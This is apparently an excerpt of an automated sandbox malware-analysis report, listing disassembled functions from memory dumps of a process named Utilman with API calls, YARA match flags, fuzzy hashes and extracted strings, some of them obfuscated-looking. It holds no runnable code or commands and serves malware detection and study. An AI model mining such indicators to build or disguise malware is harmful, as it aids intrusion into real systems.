                                                                                            Function 05122BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 463e66a3539d667bcbfd99274034d61e3d4e74d4e9c22f493aaccfd5a49b6ad6
                                                                                            • Instruction ID: 5173e9b7dcd0375637aa97baeae361d2f5f6d6761b988e6612c8b0e85958ce78
                                                                                            • Opcode Fuzzy Hash: 463e66a3539d667bcbfd99274034d61e3d4e74d4e9c22f493aaccfd5a49b6ad6
                                                                                            • Instruction Fuzzy Hash: D290023220644852D64072584555A46103587D0305F95C011B0069694D97298E55B661
                                                                                            Function 05122AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: cc96b7e762181788b58175f7fbc43e374e00d36ea9b8e000ca120190d64c97b3
                                                                                            • Instruction ID: 665a4dbe883506178efb668c700562422b5c5451cf7344089f593c89dd14603e
                                                                                            • Opcode Fuzzy Hash: cc96b7e762181788b58175f7fbc43e374e00d36ea9b8e000ca120190d64c97b3
                                                                                            • Instruction Fuzzy Hash: C6900226212400130605B6580755507106687D5351395C021F101A550CD72589616121
                                                                                            Function 05122AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 8b86f521b16a30be5beefbc50776fb7bc32a05c0d5119edc278bc5572c87c416
                                                                                            • Instruction ID: d821cfcbf4e6e30c01fc39d744a38ec6f4beeb5f2ca5c2dcd22055bc8eda2a6f
                                                                                            • Opcode Fuzzy Hash: 8b86f521b16a30be5beefbc50776fb7bc32a05c0d5119edc278bc5572c87c416
                                                                                            • Instruction Fuzzy Hash: 48900226222400120645B658075550B146597D63513D5C015F141B590CC72589656321
                                                                                            Function 051235C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 6dae4f6e2423cec3e712c256637c4e98568f92f0b52f8fc51b19a7a6df4a6487
                                                                                            • Instruction ID: 00da2686c5c9ed1fb92536e306d20a5027d13bb44d300dbf3548aad90911869f
                                                                                            • Opcode Fuzzy Hash: 6dae4f6e2423cec3e712c256637c4e98568f92f0b52f8fc51b19a7a6df4a6487
                                                                                            • Instruction Fuzzy Hash: BF90023260650412D60072584665706202587D0201FA5C411B0429568D87998A5175A2
                                                                                            Function 051239B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 4198d1fbfdef1313e7b8b726291fbba4c52db39cc680a469bbfc522683599704
                                                                                            • Instruction ID: 47dd26b0aaec8c6ef50d4dae38df52a5a116681eb96fb6084ede1fc412a4453f
                                                                                            • Opcode Fuzzy Hash: 4198d1fbfdef1313e7b8b726291fbba4c52db39cc680a469bbfc522683599704
                                                                                            • Instruction Fuzzy Hash: 7E90022224645112D650725C45556165025A7E0201F95C021B0819594D865989557221
                                                                                            Function 03223C90 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(000007D0), ref: 03223D6B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID: net.dll$wininet.dll
                                                                                            • API String ID: 3472027048-1269752229
                                                                                            • Opcode ID: 6c9133d1e965fe7aa21172f264dd81452814e44aa392cc508fafd907f1268b3c
                                                                                            • Instruction ID: cfb325ac11408b4286ce7cc25900352db34ff21716dc0864564c7440c8b57c85
                                                                                            • Opcode Fuzzy Hash: 6c9133d1e965fe7aa21172f264dd81452814e44aa392cc508fafd907f1268b3c
                                                                                            • Instruction Fuzzy Hash: DD31AEB5A11305BBD714DFA4CC80FEABBB9FB88700F00411CEA196B240C7B4B6508BA4
                                                                                            Function 0321F719 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: InitializeUninitialize
                                                                                            • String ID: @J7<
                                                                                            • API String ID: 3442037557-2016760708
                                                                                            • Opcode ID: 9cec1fc74173a054063b0e3a9ca5711a57ef5eb2096e9e0a1daa5db9cdefdeaf
                                                                                            • Instruction ID: d8408f025adc62a75a281198fa0612bf59e69fb1b667bfbe5250da09badeba62
                                                                                            • Opcode Fuzzy Hash: 9cec1fc74173a054063b0e3a9ca5711a57ef5eb2096e9e0a1daa5db9cdefdeaf
                                                                                            • Instruction Fuzzy Hash: 6F314376A1020AAFDB00DFD8DD809EFB7B9BF88304F148559E515EB214D771EE458BA0
                                                                                            Function 0321F720 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: InitializeUninitialize
                                                                                            • String ID: @J7<
                                                                                            • API String ID: 3442037557-2016760708
                                                                                            • Opcode ID: c808021e2a3c39e640a4de8537a02ca2e83a78dfc9a78bfeb8bc4f2257ca6f9f
                                                                                            • Instruction ID: 9b4d5212f8b027fea2b83fc6854ab5f871afefefa15568df003c6ce4f99a8752
                                                                                            • Opcode Fuzzy Hash: c808021e2a3c39e640a4de8537a02ca2e83a78dfc9a78bfeb8bc4f2257ca6f9f
                                                                                            • Instruction Fuzzy Hash: 1E3141B6A1020AAFDB00DFD8DD809EEB7B9BF88304B148559E515AB214D771EE458BA0
                                                                                            Function 032147B0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03214822
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Load
                                                                                            • String ID:
                                                                                            • API String ID: 2234796835-0
                                                                                            • Opcode ID: f729aad71b325cdb97dbeb40763933413b5d6b7fb509c19989d913dea0fc555e
                                                                                            • Instruction ID: 04d1d69dc96c9bc23c3c01ff655c7a99ab78ee7d394e22c7d264db11180f564a
                                                                                            • Opcode Fuzzy Hash: f729aad71b325cdb97dbeb40763933413b5d6b7fb509c19989d913dea0fc555e
                                                                                            • Instruction Fuzzy Hash: 59015EBAD1020EBBDB10EBA1DD41FDDB7B89B14208F0442A5E9089B240F671EB55CB91
                                                                                            Function 03229AE0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateProcessInternalW.KERNELBASE(?,?,?,?,0321853E,00000010,?,?,?,00000044,?,00000010,0321853E,?,?,?), ref: 03229B40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateInternalProcess
                                                                                            • String ID:
                                                                                            • API String ID: 2186235152-0
                                                                                            • Opcode ID: ac35a4eddf925d9254ffae4fe8b817297ef76e6dcc5b849ef643c183df329464
                                                                                            • Instruction ID: 2e1f87aae805cf36c69a71d823b6ccd86e67e72db628f300391e6d2e1f628652
                                                                                            • Opcode Fuzzy Hash: ac35a4eddf925d9254ffae4fe8b817297ef76e6dcc5b849ef643c183df329464
                                                                                            • Instruction Fuzzy Hash: 7701D2B6214208BFCB44DE99DC80EEB77ADAF8C754F008208FA0DE7241D670F8518BA4
                                                                                            Function 03209F20 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03209F65
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateThread
                                                                                            • String ID:
                                                                                            • API String ID: 2422867632-0
                                                                                            • Opcode ID: 461ec973f1ab384a15514dffaaff90072fb645da1ee63792b85c87c4d6b1c30b
                                                                                            • Instruction ID: 7e0b44a0a8023645ef8146a288e0a1bd730fdb4f49a13611cec208c943e9152c
                                                                                            • Opcode Fuzzy Hash: 461ec973f1ab384a15514dffaaff90072fb645da1ee63792b85c87c4d6b1c30b
                                                                                            • Instruction Fuzzy Hash: C4F0307735431436E220A6A9AC02FDBA64C8B84B61F150029F60DDA1C1D9D6B48142A5
                                                                                            Function 03209F1C Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03209F65
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateThread
                                                                                            • String ID:
                                                                                            • API String ID: 2422867632-0
                                                                                            • Opcode ID: 4be685d65ea84c00f8203d6b106098ddb1036104ace067bab6cd390d25c19962
                                                                                            • Instruction ID: 7f8b24113899f115150ad92ab7a03a52ea6b9cb134c80b038f3fdbacfbf7cef3
                                                                                            • Opcode Fuzzy Hash: 4be685d65ea84c00f8203d6b106098ddb1036104ace067bab6cd390d25c19962
                                                                                            • Instruction Fuzzy Hash: 7DF0927725471436E231B2BD9C02FCBBA4C8F85B50F194068F70DAF2C2D9E6B48082E5
                                                                                            Function 03229A00 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(03211C66,?,032258B9,03211C66,0322587F,032258B9,?,03211C66,0322587F,00001000,?,?,00000000), ref: 03229A3F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: 1e5b17512e1e55516f8326c9c16891b6268a9042548c139125952dda1877ec81
                                                                                            • Instruction ID: 34cc0d6a0786b34ae890902775ea0d50bc59cd3ba6d534f8ea398b45b8a9febe
                                                                                            • Opcode Fuzzy Hash: 1e5b17512e1e55516f8326c9c16891b6268a9042548c139125952dda1877ec81
                                                                                            • Instruction Fuzzy Hash: FDE06576210305BFCA14EF99DC41FAB37ACEFC8710F004019F908AB242D670B8118AB8
                                                                                            Function 03229A50 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,13A0E445,00000007,00000000,00000004,00000000,03214021,000000F4), ref: 03229A8F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3298025750-0
                                                                                            • Opcode ID: 60ff4789dde42194b856a07be318009ab749fac2426b1be3e6f4cf8e154f64d5
                                                                                            • Instruction ID: cf6f283a649c9e77250af4f774aca13221e8440b5ae795a1e6f88a91778ca6f4
                                                                                            • Opcode Fuzzy Hash: 60ff4789dde42194b856a07be318009ab749fac2426b1be3e6f4cf8e154f64d5
                                                                                            • Instruction Fuzzy Hash: 1EE0657A224304BBD610EE99DC40E9B37ACEF88710F004019FA08AB241C6B1B8108BB4
                                                                                            Function 03218370 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,03211F60,032281BE,0322587F,03211F2D), ref: 032183A3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 900ad9019d086012a3bb844db6a68a08cd87e7c57346aab330890379bc71db7f
                                                                                            • Instruction ID: 7de7cf50f1439ebbfefbf86df0d7ce0768edd250a969abc28d60b808356d446c
                                                                                            • Opcode Fuzzy Hash: 900ad9019d086012a3bb844db6a68a08cd87e7c57346aab330890379bc71db7f
                                                                                            • Instruction Fuzzy Hash: BDD05E766A03053FF600F7F4CC47F56328D9B58654F084068B90CDB2C2EDA5F05045A6
                                                                                            Function 0321103B Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(?,00000111), ref: 03211047
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID:
                                                                                            • API String ID: 1836367815-0
                                                                                            • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                            • Instruction ID: 4645555157aaab0d150ce4fece02a9c98b8802bf4f5b660e6cb1b3447409737b
                                                                                            • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                            • Instruction Fuzzy Hash: 76D02277B0010C7AEA1285C5ACC1CFFB76CEB84AA6F0040A3FF08E2080E6319D120BB0
                                                                                            Function 032185A2 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE ref: 032185AC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
                                                                                            • Instruction ID: 37aa049de9b21f5c221899d502f18840e88daf2e690d4fd587112c0fbf971aa2
                                                                                            • Opcode Fuzzy Hash: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
                                                                                            • Instruction Fuzzy Hash: 05C08CB123000916EB3089FC79882A37389DBA233CB1C0A10F43DD94E8D13298F7A001
                                                                                            Function 05122C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: c95cf614a9aa18205dc4bc2dbf6548e1c6e8f7e7fa50bdc1f78ba6ab1ffecb18
                                                                                            • Instruction ID: a3b2fce57a8d07bfe45fcf432ae8cb8150c2e4aa86f34669a91a0e2ddd45d866
                                                                                            • Opcode Fuzzy Hash: c95cf614a9aa18205dc4bc2dbf6548e1c6e8f7e7fa50bdc1f78ba6ab1ffecb18
                                                                                            • Instruction Fuzzy Hash: 72B09B729025D5D5DF11E7604709B1B791177D0701F65C461E2174641E473CC1E1F175

                                                                                            Non-executed Functions

                                                                                            Function 0540E019 Relevance: 57.7, Strings: 46, Instructions: 215COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4563317967.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_5400000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                            • API String ID: 0-3754132690
                                                                                            • Opcode ID: adb72f32349823912660fa9318eaa816488cf661e96bc489d8941ceb0da049aa
                                                                                            • Instruction ID: 231798bc8c54c4243b91c56863171895752ac9faad60621ee54830b88b8a4929
                                                                                            • Opcode Fuzzy Hash: adb72f32349823912660fa9318eaa816488cf661e96bc489d8941ceb0da049aa
                                                                                            • Instruction Fuzzy Hash: F1917DF04083948AC7158F58A0652AFFFB1EBC6304F15856DE7A6BB243C3BE89158B85
                                                                                            Function 05403C31 Relevance: 38.8, Strings: 31, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4563317967.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_5400000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: "5,;$(5/+$)+-)$,5+5$.5*2$.5+;$/"5N$3Lru$3PSO$4.(,$4.(,$4/(/$5"/;$5(-$5(-;$;UO;$;Zkk$;\~x$H;Hz$VW7;$Vtar$Xsit$ZTW4$ZTWY$pt2;$v~4($wrp~$wwz4$w~L~$yPro$}zir
                                                                                            • API String ID: 0-518239860
                                                                                            • Opcode ID: 673b638450db9726f75077e2047301e5fe0874b7cbf5c623e85d9397eb220102
                                                                                            • Instruction ID: 749b9fff39d8fe6ff7f17d67791c5f605a7b35f77154343daa61f0430568a654
                                                                                            • Opcode Fuzzy Hash: 673b638450db9726f75077e2047301e5fe0874b7cbf5c623e85d9397eb220102
                                                                                            • Instruction Fuzzy Hash: 353138B081434CDBCF19DF85E5806DDBB72FB04385F809119E8096F358CAB58A56CB89
                                                                                            Function 05122890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                            • API String ID: 48624451-2108815105
                                                                                            • Opcode ID: 2834c42b69d9c03705a608e4d4a2814423aaa5b98809bb784f8fcffa8becd9d1
                                                                                            • Instruction ID: a9f76ed828f9a577a9101ddcccdcfc22c0d7f888f56a740542c9f0a7ad2edc99
                                                                                            • Opcode Fuzzy Hash: 2834c42b69d9c03705a608e4d4a2814423aaa5b98809bb784f8fcffa8becd9d1
                                                                                            • Instruction Fuzzy Hash: 9B51F6B6B04126BFCF24DFA8899097EF7F9BF08201B548269E4B5D7641E374DE1087A0
                                                                                            Function 05192410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                            • API String ID: 48624451-2108815105
                                                                                            • Opcode ID: 632495f30c337337c159d0127c77271844d8e494d97185bed949f724e2e97438
                                                                                            • Instruction ID: 0ed3a9061b7de3d9566a0059fdb98509a364aab82b7b5440daac1873b6c114c9
                                                                                            • Opcode Fuzzy Hash: 632495f30c337337c159d0127c77271844d8e494d97185bed949f724e2e97438
                                                                                            • Instruction Fuzzy Hash: 7351E7B9A04645BEDF38DF5CC8909BFB7FAEB44200B448859E4A6D7641D7B4EE40C760
                                                                                            Function 05117630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 05154787
                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05154725
                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05154742
                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05154655
                                                                                            • Execute=1, xrefs: 05154713
                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 051546FC
                                                                                            • ExecuteOptions, xrefs: 051546A0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_50b0000_Utilman.jbxd
                                                                                            Similarity
                                                                                            • API ID:
